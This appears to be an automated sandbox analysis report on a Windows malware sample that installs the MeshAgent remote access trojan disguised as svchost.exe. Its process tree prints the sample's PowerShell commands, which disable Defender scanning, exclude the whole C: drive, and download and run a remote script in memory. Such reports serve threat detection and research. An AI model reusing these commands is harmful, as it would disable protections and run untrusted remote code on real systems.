Analysis

  • max time kernel
    147s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    16-10-2024 12:07

General

  • Target

    2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe

  • Size

    50.9MB

  • MD5

    5bfa176d4d484262d8762d97bcd2b784

  • SHA1

    7f09db1fa2d3f0d4f73621516eabd95f9175de96

  • SHA256

    54eb6f4d6682a9f61182fef1b6162019fd205710b14fee3719bce58ba9d3bcc6

  • SHA512

    93b76a827932ca934b9a76afa0347e7f3e63ba4e09a240b29604edde0903802bd27646e840858374b77f74d9b3fabcca8767f1ab949cd0a0abbb627e4a9b1675

  • SSDEEP

    1572864:95vrmbfVqelXwwPAo8DzC7XhPDLbg5QOApSqugmBRYW6Q/:fI9XwKAoqOsaUNBsQ/

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    ps1.dropper: https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 64 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:1460
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"C:\*\"; CiTool.exe -rp \"{PolicyId GUID}\" -json; powershell -nop -ExecutionPolicy Bypass -c \"Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')\" "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3616
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\*
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3976
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ExecutionPolicy Bypass -c "Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4048
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4072
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4768
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1824
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            PID:5024
          • C:\Users\Admin\AppData\Local\svchost\svchost.exe
            C:\Users\Admin\AppData\Local\svchost\svchost.exe -install
            5⤵
            • Sets service image path in registry
            • Executes dropped EXE
            PID:2316
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c install.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4060
      • C:\Users\Admin\AppData\Local\Temp\install.exe
        install.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:920
        • C:\Windows\SysWOW64\msiexec.exe
          msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSIBBDE.tmp
          4⤵
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:984
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2608
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding E5BD01B1DB0AB92A5BB72FE44CC2ACEF C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:4400
  • C:\Users\Admin\AppData\Local\svchost\svchost.exe
    "C:\Users\Admin\AppData\Local\svchost\svchost.exe" --meshServiceName="Microsoft"
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Modifies data under HKEY_USERS
    • Suspicious use of WriteProcessMemory
    PID:116
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      PID:4428
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      PID:2244
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      PID:1908
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      PID:1148
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      PID:4568
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      PID:4720
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies data under HKEY_USERS
      PID:4280

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\MSIBBDE.tmp

    Filesize

    36.6MB

    MD5

    6d9b5a3b75da266db5c237b0ac70b7f9

    SHA1

    9ce4aa208974b299ce0abeaf043740616f4f0b02

    SHA256

    d57614b838f083937ff98c161e55fa60b5d23de639818ad6eef8335ba23c031b

    SHA512

    fb458b1c2d3b9da748b1775b1bf2098fbe5076a0bc3daf2a93e1be978e3b7e34bc7a75c2660ef97cac3e7ba23ebceae1785dfe8ac124440f34dbd248cd92571d

  • C:\Users\Admin\AppData\Local\Temp\MSIBFF4.tmp

    Filesize

    298KB

    MD5

    684f2d21637cb5835172edad55b6a8d9

    SHA1

    5eac3b8d0733aa11543248b769d7c30d2c53fcdb

    SHA256

    da1fe86141c446921021bb26b6fe2bd2d1bb51e3e614f46f8103ffad8042f2c0

    SHA512

    7b626c2839ac7df4dd764d52290da80f40f7c02cb70c8668a33ad166b0bcb0c1d4114d08a8754e0ae9c0210129ae7e885a90df714ca79bd946fbd8009848538c

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4xcutgyo.l4u.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\install.exe

    Filesize

    36.6MB

    MD5

    979ce82b2ea35a92fae6a60c6c3e3791

    SHA1

    8d260eea0151ee7a6aae88eb2e9015d5efb2603b

    SHA256

    be86cadf405e9f617601da44bab88f08b3e92ac4349a2616378a9195722925ca

    SHA512

    ec67c1d20ae0f9fffcf471d60f2ade6e08fd5a0e572ee1b58036ce11c5f353db93b622c795fe013a0dbe91fe4921b5ba50c312b8c51716d5cc4921d2050f2724

  • C:\Users\Admin\AppData\Local\svchost\svchost.exe

    Filesize

    5.3MB

    MD5

    29304e42dc26d1276ca93a9c013599a4

    SHA1

    65437796133c2704d20757c99b768ffd915d1502

    SHA256

    83e75c4b57f3a255ec9efcdbda027a5b9577a993359c9a21946d5bec45924dd9

    SHA512

    fa0e66a941030fc9bde0b84e98645f04e3405fe76e539e214f1c1069661ca699e93d245a56fe37d4eec36fa13710bcc1b6c1373d9a0f9a0656ba233ee2aae8ca

  • C:\Users\Admin\AppData\Local\svchost\svchost.msh

    Filesize

    22KB

    MD5

    90f91efb0b6cc632ea6b2bb3a6d5fb40

    SHA1

    e46a39e7252e086f34d64c3d720442cd325de506

    SHA256

    7db6fa16d92fa026ba88337e51623caea566a78eb275af77905286a533792fc9

    SHA512

    f511124b19a4f05e09f253f5f63e991694565247f9c09430368f53d5466ecb8822811107c7c0a9e91e8d1b0ff85bfa37a243b0635eb893c8fae39ea8152c3928

  • memory/1460-5-0x0000000000990000-0x0000000004108000-memory.dmp

    Filesize

    55.5MB

  • memory/1460-50-0x0000000000990000-0x0000000004108000-memory.dmp

    Filesize

    55.5MB

  • memory/1460-48-0x0000000000990000-0x0000000004108000-memory.dmp

    Filesize

    55.5MB

  • memory/3616-11-0x00000216CBAF0000-0x00000216CBB00000-memory.dmp

    Filesize

    64KB

  • memory/3616-12-0x00007FF83C273000-0x00007FF83C275000-memory.dmp

    Filesize

    8KB

  • memory/3616-10-0x00000216CBA50000-0x00000216CBA72000-memory.dmp

    Filesize

    136KB

  • memory/4072-23-0x00000226BC070000-0x00000226BC0E6000-memory.dmp

    Filesize

    472KB

  • memory/4072-22-0x00000226BBFA0000-0x00000226BBFE4000-memory.dmp

    Filesize

    272KB